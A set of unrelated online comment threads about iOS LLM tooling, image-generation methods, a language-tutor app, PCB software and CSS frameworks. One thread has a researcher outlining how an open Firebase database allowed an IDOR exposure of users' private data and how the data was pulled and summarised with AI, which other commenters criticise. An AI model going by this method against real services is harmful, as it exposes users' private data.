I do a lot of AI work and right now the story for doing LLMs on iOS is very painful (but doing Whisper or etc is pretty nice) so this is existing and the API looks Swift native and great, I can't wait to use it!
Question/feature request: Is it possible to bring my own CoreML models over and use them? I honestly end up bundling llama.cpp and doing gguf right now because I can't figure out the setup for using CoreML models, would love for all of that to be abstracted away for me :)
That’s a good suggestion, and it indeed sounds like something we’d want to support. Could you help us better understand your use case? For example, where do you usually get the models (e.g., Hugging Face)? Do you fine-tune them? Do you mostly care about LLMs (since you only mentioned llama.cpp)?
Thank you! I’ve been fine tuning tiny Llama and Gemma models using transformers then exporting from the safetensors that spits out — My main use case is LLMs but I’ve also tried getting YOLO finetuned and other PyTorch models running and ran into similar problems, just seemed very confusing to figure out how to properly use the phone for this.
Thanks for sharing the details—that makes a lot of sense. Fine-tuning and exporting models on-device can be tedious nowadays.
We’re planning to look into supporting popular on-device LLM models more directly, so deployment feels much easier. We'll let you know here or reach out to you once we have something
Hi all, i'm the security researcher mentioned in the article -- just to be clear:
1. The leak Friday was from firebase's file storage service
2. This one is about their firebase database service also being open (up until Saturday morning)
The tl;dr is:
1. App signed up using Firebase Auth
2. App traded Firebase Auth token to API for API token
3. API talked to Firebase DB
The issue is you could just take the Firebase Auth key, talk to Firebase directly, and they had the read/write/update/delete permissions open to all users so it opened up an IDOR exploit.
I pulled the data Friday night to have evidence to prove the information wasn't old like the previous leak and immediately reached out to 404media.
And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.
If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56
Doesn't that Gemini summary gist tie usernames to pretty specific highly personal non-public stories? That seems like a significant violation of ethical hacking principles.
They're anonymous usernames the app had them make and they were told don't use anything shared elsewhere and I googled and there's not any uniquely identifiable people from any of them.
They seem generic enough that I think it's okay, but you're right there is no need in including them and I should've caught that in the AI output, thank you!!
I think including specific stories is already an ethical hacking violation.
Including the pseudonyms associated with those stories creates unnecessary risk of, and arguably incentive for those individuals.
I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer" but then exposed part of that data to generate an AI summary.
Having the file on your computer is questionable enough but not treating it as something private to be professionally protected is IMHO another ethical violation.
I don't see the need for the AI output to begin with. Normally pen-testers just demonstrate breaches, this is more like exposing what users do on the app.
Yes! haha! But hopefully I have a good enough support group and connections that I'll be ok if that happens, I just really wanted to prove that they were not being honest when they said it was data prior to 2024.
i've been trying to keep up with this field (image generation) so here's quick notes I took:
Claude's Summary: "Normalizing flows aren't dead, they just needed modern techniques"
My Summary: "Transformers aren't just for text"
1. SOTA model for likelihood on ImageNet 64×64, first ever sub 3.2 (Bits Per Dimension) prev was 2.99 by a hybrid diffusion model
2. Autoregressive (transformers) approach, right now diffusion is the most popular in this space (it's much faster but a diff approach)
tl;dr of autoregressive vs diffusion (there's also other approaches)
Autoregression: step based, generate a little then more then more
Diffusion: generate a lot of noise then try to clean it up
The diffusion approach that is the baseline for sota is Flow Matching from Meta: https://arxiv.org/abs/2210.02747 -- lots of fun reading material if you throw both of these into an LLM and ask it to summarize the approaches!
You have a few minor errors and I hope I can help out.
> Diffusion: generate a lot of noise then try to clean it up
You could say this about Flows too. The history of them is shared with diffusion and goes back to the Whitening Transform. Flows work by a coordinate transform so we have an isomorphism where diffusion works through, for easier understanding, a hierarchical mixture of gaussians. Which is a lossy process (more confusing when we get into latent diffusion models, which are the primary type used). The goal of a Normalizing Flow is to turn your sampling distribution, which you don't have an explicit representation of, into a probability distribution (typically Normal Noise/Gaussian). So in effect, there are a lot of similarities here. I'd highly suggest learning about Flows if you want to better understand Diffusion Models.
> The diffusion approach that is the baseline for sota is Flow Matching from Meta
To be clear, Flow Matching is a Normalizing Flow. Specifically, it is a Continuous and Conditional Normalizing Flow. If you want to get into the nitty gritty, Ricky has a really good tutorial on the stuff[0]
It uses OpenAI's realtime API to simulate either a tutoring session (the speaker will revert to English to help you) or a first date or business meeting (the speaker will always speak the target language)
You can see the AI's transcriptions but not your own, limitation of the current OpenAI API but definitely something I can fix.
I'm not fully in love with the app so I'd love any feedback or hearing if it works well for you -- It doesn't have a lot of features yet (including saving context) and if you bump into the time limit just open it up in incognito to keep going.
This is great! Maybe some more tourist-related scenarios, like "ordering at restaurant", "resolving dispute about rental car crash" etc? :-)
The "next level" feature would be to get it to speak even simpler, with some hints about how to reply, for the beginners. I don't know how that would ideally look, but maybe a button to pop up some "key words" or phrases that one could use? (Even so, I found myself using the little I know, so it's obviously somehow working even though my knowledge is extremely basic.)
This is one of the places where I feel LLM's can do something good for the world, giving a safe playground for getting experience with speaking new languages without the anxiety of performing badly in front of other people – and hopefully make it easier to connect with real people in that language later.
One small piece of feedback… There were a couple times where I asked to learn something, and it asked me to repeat a phrase back, which was great. But when I repeated it back, I know I didn’t quite nail it (eg perhaps said “un” instead of “una”) and rather than correcting me, it actually told me I did it perfectly. Maybe there’s some tuning with the prompts that may help turn down the natural sycophancy of the model and make sure it’s a little more strict.
Amazing idea, do you think this should be a freeform text field the user can enter to add their own prompts to or should it be a checkbox/select on the homepage so the user can pick from a limited set?
Did you just add Dutch as per the submitter’s request or was it part of your plan prior?
Curious because I’m trying to learn Romanian, and since it’s a less common language there are fewer resources available. So I wasn’t sure if you added Dutch with minimal amount of effort following the poster’s request.
That said, I gave your app a try with Spanish and it looks pretty good! But I didn’t see a Help page to clarify how I’m “supposed” to interact. Eg I tried saying in English “I don’t understand” (even though I know how to say that in Spanish) and it responded in Spanish which may be hard for absolute beginners. Although full immersion is much better way to learn.
I can try playing around more with it to give you some feedback.
> Eg I tried saying in English “I don’t understand” (even though I know how to say that in Spanish) and it responded in Spanish which may be hard for absolute beginners.
I tried to use ChatGPT as a "live" translator with my in laws and I noticed it is extremely bad at language "consistency" or at understanding your intent when it comes to multiple languages.
It will sometimes respond in English when you talk to it in the foreign language, it will sometimes assume that a clear instruction like "repeat the last sentence" needs to be translated, etc.
I don't know how the person above is approaching the problem but your experience is consistent with mine and I don't think GenAI models (at least OpenAI ones) are suitable for the task.
I'm a native Dutch speaker and tried this out for a bit. It works impressively well although it might be challenging for complete beginners. Maybe you can add an option for the trainer to use more simple language for beginners?
I tried practicing some verb conjugations. The trainer displayed some fill-in-the-blank sentences like "she ... home after class", asking me to conjugate "to walk" in that sentence. However, the audio actually pronounced the full sentence "she walks home after class", giving away the answer.
Just tried this for Spanish and it works incredibly well. I have been hacking on something similar for translation (it's really quite easy too, just a few prompts), but I was using Google Translate's interface for vocalizing! This is seriously good stuff, really nice work putting it together.
I will probably use something like this for language practice.
I just tried it and it works perfectly. The color scheme and font size could be touched up to look better. Just out of curiosity, is $10/month enough to cover the (unlimited) API cost? Do you estimate how many percentage of your users will use more than $10 API fee each month?
Thanks so much for trying it out! The realtime API is actually very cheap especially for short connections, for each user who uses it 30 minutes a day every day in a month it costs me ~$5 and I assume the average user is going to use it way less than that (although i have 0 users right now haha)
I've used the realtime API for something similar (also related to practicing speaking, though not for foreign languages). I just wanted to comment that the realtime API will definitely give you the user's transcriptions -- they come back as an `server.conversation.item.input_audio_transcription.completed` event. I use it in my app for exactly that purpose.
Thank you so much!! While the transcription is technically in the API it's not a native part of the model and runs through Whisper separately, in my testing with it I often end up with a transcription that's a different language than what the user is speaking and the current API has no way to force a language on the internal Whisper call.
If the language is correct, a lot of the times the exact text isn't 100% accurate, if that's 100% accurate, it comes in slower than the audio output and not in real time. All in all not what I would consider feature ready to release in my app.
What I've been thinking about is switching to a full audio in --> transcribe --> send to LLM --> TTS pipeline, in which case I would be able to show the exact input to the model, but that's way more work than just one single OpenAI API call.
Heyo, I work on the realtime api, this is a very cool app!
With transcription I would recommend trying out "gpt-4o-transcribe" or "gpt-4o-mini-transcribe" models, which will be more accurate than "whisper-1". On any model you can set the language parameter, see docs here: https://platform.openai.com/docs/api-reference/realtime-clie.... This doesn't guarantee ordering relative to the rest of the response, but the idea is to optimize for conversational-feeling latency. Hope this is helpful.
Ah yes, I've seen that occasionally too, but it hasn't been a big enough issue for me to block adoption in a non-productized tool.
I actually implemented the STT -> LLM -> TTS pipeline, too, and I allow users to switch between them. It's far less interactive, but it also gives much higher quality responses.
This is super cool (i do a LOT of react native after years of doing native development) -- one thing I'd love: Adding easy upgrades, right now if I leave a RN app for a while getting it to compile on latest iOS/Android again requires a lot of manual labor and reviewing rn-diff-purge. Good luck on the project!
Autodesk bought EAGLE in 2016, so just about ten years between acquisition and discontinuation.
EAGLE is the first PCB design app I learned (and had a harder onramp than React) so this is sad, but it is important to note that most hobbyists have already switched over to KiCad: https://www.kicad.org/
Even professionally, some of the places I worked for lately preferred KiCAD because you can check in libraries and projects to git and see meaningful diffs.
I am not sure if you realize that Eagle is fully embedded and rebranded within Fusion360 so you will have access to the same functionality but in integrated environment (for better or worse)
Speaking as a subscriber to Fusion: Do-it-all software is nearly always inferior to special purpose software. I don't use the built-in Eagle functionality in Fusion even though I've paid for it.
Yeah, I have no love for Autodesk as a begrudging Fusion360 user, but on the surface it seems that 10 years before sunsetting an acquired product as well as integrating it into an existing platform in that same timeframe is pretty good as far as a product acquisition goes from an end user perspective.
Surprised it lasted that long. This reminds me of when they bought out Softimage in 2009 because XSI might have grown into something that challenges Maya, then released the last version in 2014 after delivering five years of barely any new features.
It's anecdotal, but I just recently started getting into more hardware-oriented stuff and found that KiCad came recommended for PCB design/etc. I found it to be pretty useful, but I'm too much of a novice to really give it a fair shake.
My advice to new kicad users is just to watch someone on YouTube go through a familiar project and see how their flow is, then try to create your own project from design to implementation. Next, check out the kicad library guidelines to see what it takes to create a library part so you can get everything right. Lastly, open up the shortcuts screen so you can see what key does what, you’ll get the most common ones quickly and the others you can see when you are going through menus.
Also used EAGLE first briefly for hobbyist work, right after it got acquired, but my team switched to Altium soon that seemed maybe too powerful for my sake. I used KiCad afterwards and it works on Mac like EAGLE did.
love running into old friends on HN, so some very stale info from someone who hasn’t worked at SO in many years: while the job board was differentiated and nice from the programmers side, it’s really difficult to convince recruiters to use a new system with new rules. most (not all ofc) just want to spray and pray.
as a job seeker being told “you’re gonna have the upper hand here” is amazing, as a recruiter it makes it very difficult to sell to unless you really own the market.
Why would they offer him a job right before saying that? Some of it could be true, absolutely, but it seems more emotionally manipulative than anything else, to me. The CEO was mad so he said something.
> Why would they offer him a job right before saying that?
A few people have mentioned that on this thread, but I don't think it's in sync with the reality of how incredibly hard it is to hire technical talent right now, esp talent that knows your systems well.
It's entirely possible for someone to be the most demanding intern a co has ever had and still be a great hire; hell, it might even be _correlated_. Interns usually haven't figured out workplace norms yet, and combining that with being smart and driven could easily yield good-faith behavior that nevertheless is "demanding" (for example, asking lots of questions about tasks he's given, asking for guidance with parts of the system he's not working on, etc etc). In that case, I would absolutely want to hire that intern, with the understanding that he'd need to get better at the cultural aspects of the job once he joined full-time (as all intern conversions do).
That being said, no question that it was a bizarre and immature thing for the CEO to bring up, and I don't disagree with your characterization of it as "emotionally manipulative".
I'm looking at this from the perspective of "is the emotion/frustration felt by the CEO valid". In other words, did this open source author actually do ANYTHING which could cause frustration in a previous employer. An important part of that is whether they were actually a 50% pain in the ass employee who repeatedly was pushy (but still perhaps is hireable because they were net positive)
I'm disregarding any commentary on actual action taken by the CEO, because as I said I think it's incredibly stupid and immature.
This reply below by @treis is a good explanation of how i feel about the answer to your question.
> Lots of CEOs/Owners will definitely be salty about that. And they're not totally wrong to feel that way. You pay someone a bunch of money only to watch them walk and help your competitor take your market share. It's understandable why that's upsetting. But they should have the maturity to understand that's how the world works and not throw a tantrum.
This wikipedia list is missing a lot of APIs, it seems more related to products -- For example, the QPX API (which I used) was shut down this April and is nowhere in that list. Your numbers are lower than they should be.
Notable there would be the recent incident where Twitter bought some ML startup for abuse analysis and shut down customers overnight with almost no warning.
The framework being advertised as a minimal lightweight framework and having its size compared to the biggest frameworks is a bit off-putting to me.
I get that they wouldn't want to advertise their competitors, but the comparison matrix on the page makes mini.css seem tiny, where as a google search shows it's the biggest popular framework like this.
Mini.css is 7KB gzipped, Milligram[0] (the first google result I see for "minimalist css framework", mini.css is second) is 2KB gzipped. Pure.css[1] (the third result) is 3.8KB gzipped.
Such a pity you didn't include my own, Picnic CSS[2]. One of the main features is Lightweight (7kb min+gzip, same as mini), and it is also popular (2177 stars). It focuses on beautiful and cohesive components out of the box:
Thanks! It's a pity that the SCSS is basically undocumented, as I use it in most projects and it has really awesome features that only I know. But the time sink would be tremendous and I'm focusing on another project right now.
I guess it's a translation issue, no need to insult me. The tone was intended to be totally different, the first one like "hey take a look at this" and the second one more like "I wish I could have done it" (and because of the different feeling I didn't realize I had already written the same expression before).
Nice, while you are at it I also have a production-ready JS library https://umbrellajs.com/ and an experimental and not so browser-compatible one https://superdom.site/ in case you are interested.
BTW I cannot seem to see the people behind it, the "About" only says "This website was made by people. In the interests of inclusivity, we're aiming to get some robots to contribute soon."
Seems a bit lame to complain that someone chooses to not reveal who they are.
Frankly, I think you need to be less aggressive shilling your own projects in a "competitor's" submission. ctrl-f for your own username. It's a bit much.
But I wasn't complaining at all! I was just curious about who was behind it so pointing it out just in case it was an error in the code or in my browser.
And sure, I am passionate about minimal programming so I've done quite a few projects and point them out as relevant examples. Though I agree I got a bit carried away (3 comment threads with external links) in this thread, my apologies (cannot change it now). See my submission history ( https://news.ycombinator.com/threads?id=franciscop ) for a full picture, I don't link to my projects nearly as much as I did in here and I'll just comment relevant info without so many external links in the future.
About the "about" page, the site is quite unfinished :( I want to add more information, examples and resources, but have fallen behind. I hope to fix that quite soon.
Also a lot of the frameworks compared against are totally modular, so comparing against the full framework size doesn't really mean a lot, because it almost never makes sense to include every framework module.
E.g. in Bootstrap 3 if you only want typography, it's 9kb min/2.8kb gz, for typography+forms+buttons it's 27kb min/5.kb gz, for all 'common CSS' (incl grid + responsive utilities) it's 46kb min/8.8kb gz.
The comparison size of 20kb gz is only if you pulled in every additional component available.
Both of those are gorgeous. Mini.css, not so much. I mean, Mini is fine...better than I could do. But, when I visit, I feel neutral about it. I can't imagine it improving my projects just by including it. And, the example of Mini customization (http://codepen.io/chalarangelo/pen/YNKYgz) is downright ugly.
I use CSS frameworks (mostly Bootstrap) because I suck at design. I need a hand up, and a good framework provides it. Customization is necessary, but not all that's necessary.
Question/feature request: Is it possible to bring my own CoreML models over and use them? I honestly end up bundling llama.cpp and doing gguf right now because I can't figure out the setup for using CoreML models, would love for all of that to be abstracted away for me :)